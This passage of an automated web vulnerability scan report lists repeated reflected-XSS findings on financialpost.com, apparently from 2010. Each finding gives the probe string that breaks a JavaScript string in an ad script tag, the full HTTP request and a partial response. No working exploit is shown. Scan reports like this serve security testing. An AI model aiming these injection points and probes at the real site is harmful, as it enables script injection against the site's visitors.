<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css/idc1b313';698c4e0738c/idms_styles;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css;kw=idc1b313';698c4e0738c;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=18982883?">
...[SNIP]...

1.24. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/idms_styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3be0'%3b80f99c8f660 was submitted in the REST URL parameter 4. This input was echoed as e3be0';80f99c8f660 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css/idc/e3be0'%3b80f99c8f660 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:40 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43284


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css/idc/e3be0';80f99c8f660/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css;kw=idc;kw=e3be0';80f99c8f660;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=22371374?">
...[SNIP]...

1.25. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/watchlist.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 124dc'%3b0b5b2a36149 was submitted in the REST URL parameter 1. This input was echoed as 124dc';0b5b2a36149 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets124dc'%3b0b5b2a36149/css/idc/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:23 GMT
Date: Sun, 19 Dec 2010 03:03:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43333


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets124dc';0b5b2a36149/css/idc/watchlist;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets124dc';0b5b2a36149;kw=css;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30497961?">
...[SNIP]...

1.26. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/watchlist.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9facd'%3bc69670aae3e was submitted in the REST URL parameter 2. This input was echoed as 9facd';c69670aae3e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css9facd'%3bc69670aae3e/idc/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:28 GMT
Date: Sun, 19 Dec 2010 03:03:28 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43298


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css9facd';c69670aae3e/idc/watchlist;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css9facd';c69670aae3e;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=87037935?">
...[SNIP]...

1.27. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/watchlist.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f6a'%3b858dfffb16a was submitted in the REST URL parameter 3. This input was echoed as a9f6a';858dfffb16a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css/idca9f6a'%3b858dfffb16a/watchlist.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:33 GMT
Date: Sun, 19 Dec 2010 03:03:33 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43261


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css/idca9f6a';858dfffb16a/watchlist;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css;kw=idca9f6a';858dfffb16a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=56715887?">
...[SNIP]...

1.28. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/watchlist.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f81'%3b65df32cf4f8 was submitted in the REST URL parameter 4. This input was echoed as 88f81';65df32cf4f8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css/idc/88f81'%3b65df32cf4f8 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:39 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43284


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css/idc/88f81';65df32cf4f8/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css;kw=idc;kw=88f81';65df32cf4f8;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=56091540?">
...[SNIP]...

1.29. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b85'%3bc4767f71b50 was submitted in the REST URL parameter 1. This input was echoed as 40b85';c4767f71b50 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets40b85'%3bc4767f71b50/include/thirdparty/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:27 GMT
Date: Sun, 19 Dec 2010 03:03:27 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43677


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets40b85';c4767f71b50/include/thirdparty/idc/ad-init;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets40b85';c4767f71b50;kw=include;kw=thirdparty;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou
...[SNIP]...

1.30. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b9d1'%3b3317ae53630 was submitted in the REST URL parameter 2. This input was echoed as 8b9d1';3317ae53630 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/include8b9d1'%3b3317ae53630/thirdparty/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:32 GMT
Date: Sun, 19 Dec 2010 03:03:32 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43640


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/include8b9d1';3317ae53630/thirdparty/idc/ad-init;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=include8b9d1';3317ae53630;kw=thirdparty;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'o
...[SNIP]...

1.31. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1cea'%3b38c5aa0a5e8 was submitted in the REST URL parameter 3. This input was echoed as f1cea';38c5aa0a5e8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/include/thirdpartyf1cea'%3b38c5aa0a5e8/idc/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:37 GMT
Date: Sun, 19 Dec 2010 03:03:37 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43604


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/include/thirdpartyf1cea';38c5aa0a5e8/idc/ad-init;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=include;kw=thirdpartyf1cea';38c5aa0a5e8;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=32534089
...[SNIP]...

1.32. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6456b'%3b4a9a61322fb was submitted in the REST URL parameter 4. This input was echoed as 6456b';4a9a61322fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/include/thirdparty/idc6456b'%3b4a9a61322fb/ad-init.js HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:42 GMT
Date: Sun, 19 Dec 2010 03:03:42 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43587


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/include/thirdparty/idc6456b';4a9a61322fb/ad-init;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=include;kw=thirdparty;kw=idc6456b';4a9a61322fb;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=68207987?">
...[SNIP]...

1.33. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/include/thirdparty/idc/ad-init.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9094'%3b9fe591fa809 was submitted in the REST URL parameter 5. This input was echoed as e9094';9fe591fa809 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/include/thirdparty/idc/e9094'%3b9fe591fa809 HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://idms.financialpost.com/watchlist/watchlist.idms
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:03:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:03:47 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43595


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/include/thirdparty/idc/e9094';9fe591fa809/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=include;kw=thirdparty;kw=idc;kw=e9094';9fe591fa809;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=35880543?"
...[SNIP]...

1.34. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /ajax/email/generic.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c67f5'%3b33a72d2d10d was submitted in the REST URL parameter 1. This input was echoed as c67f5';33a72d2d10d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajaxc67f5'%3b33a72d2d10d/email/generic.xml HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:13 GMT
Date: Sun, 19 Dec 2010 02:58:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43245


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/ajaxc67f5';33a72d2d10d/email/generic;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=ajaxc67f5';33a72d2d10d;kw=email;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=56945468?">
...[SNIP]...

1.35. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /ajax/email/generic.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9df8'%3b9082a8b2204 was submitted in the REST URL parameter 2. This input was echoed as e9df8';9082a8b2204 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ajax/emaile9df8'%3b9082a8b2204/generic.xml HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43209


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/ajax/emaile9df8';9082a8b2204/generic;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=ajax;kw=emaile9df8';9082a8b2204;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=69619233?">
...[SNIP]...

1.36. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /ajax/email/generic.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e698'%3b8b8919e8594 was submitted in the REST URL parameter 3. This input was echoed as 6e698';8b8919e8594 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

